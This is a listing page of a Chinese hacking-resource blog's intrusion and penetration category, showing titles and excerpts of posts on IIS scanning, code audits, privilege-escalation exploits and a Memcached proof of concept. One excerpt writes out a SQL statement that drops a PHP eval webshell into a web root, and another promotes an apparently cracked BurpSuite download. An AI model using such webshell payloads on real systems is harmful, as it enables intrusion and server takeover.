入侵渗透 - 第一资源网_专注资源与福利收集分享的第一资源_DYBOY

入侵渗透

入侵渗透的文章共有63条

黑客神器 | IIS短文件名漏洞及利用工具

小东 2018-2-14 阅读(149889)

小白入门的时候，也就是我，一开始拿着SQLMAP满世界的跑SQL注入漏洞哈哈，如上图，今天分享一款非常实用的小工具针对IIS的短文件名漏洞的扫描工具IIS_shortname_Scanner.p...

标签: 黑客技术入侵渗透

渗透测试常用的写SHELL语句参考

小东 2018-2-10 阅读(63763)

SQL写入一句话：select'<?phpeval($_POST[dyboy]);?>'intooutfile'd:/wwwroot/1.php';linux擦屁股一句话：cd~cat...

标签: 黑客技术黑客前线入侵渗透

提权EXP一览表

小东 2018-2-8 阅读(86033)

WINDOWS：#SecurityBulletin#KB#Description#OperatingSystemCVE-2017-0213　[WindowsCOMElevationofPri...

标签: 黑客技术黑客前线入侵渗透

XYCMS留言板V1.7代码审计

小东 2018-2-1 阅读(79220)

官网page：http://www.jsxyidc.com/YCMS留言板是以php+MySQL进行开发的php留言板源码，软件为普通的留言板可广泛应用于企业网站等需要留言板的网站中进行使用。下载地址：http://down.china...

标签: 黑客技术入侵渗透网络安全

黑客神器 | BurpSuite1.7.26永购版-限时下载

小东 2017-12-31 阅读(109956)

软件说明：搞安全的朋友必备的神器，但是最近大家使用的BurpSuite集体失声（就是证书到期了）网上现在分享的东西，有的带后门，你懂的&...

标签: 神兵利器黑客技术入侵渗透

2018最新代码审计教程笔记-代码审计入门

小东 2017-12-29 阅读(92733)

由于之前的学习不是非常的系统，故此重新整理学习“代码审计”，博客也更新相关内容。0x01：调试函数echo(print):这是最简单的输出数据调试方法，一般用来输出变量值...

标签: 黑客前线入侵渗透玩转代码

EMLOG漏洞 | 敏感信息泄漏phpinfo-代码审计

小东 2017-12-24 阅读(115550)

Emlog是一款个人博客系统，使用的人还是非常多的，小巧方便，对于个人站长来说是一个建站的不错选择。今天要公布一个危害轻微的漏洞：phpinfo暴露敏感信息其实这个漏洞也不算什么吧，以...

标签: 早知道入侵渗透玩转代码 Emlog教程

【站内资讯】近日因遭大量DDOS攻击而反查大黑阔

小东 2017-11-10 阅读(120018)

最近小东的网站（第一资源网）遭到大量ddos攻击，前几天有人给小东反应了这个问题。刚开始，还没注意，觉得就这样吧，反正服务器费用也不贵，可能还赶不上DDOS的费用......

标签: 黑客技术黑客前线入侵渗透

黑客技术 | Memached代码执行poc

小东 2017-11-9 阅读(75714)

dockerimages//列出镜像dockerrun-d-p11211:11211af1336632a51//启动容器dockerps//查看容器是否运行ok运行成功...

标签: 技术教程黑客技术黑客前线入侵渗透

WEB安全 | PHP漏洞大全-详细分析php漏洞

小东 2017-11-8 阅读(90664)

简简单单的分享PHP相关漏洞的总结，大家可以Ctrl+D收藏记不住的时候就来看看~针对PHP的网站主要存在下面几种攻击方式:1、命令注入(CommandInjection)2、eval注...

标签: 黑客技术黑客前线入侵渗透

2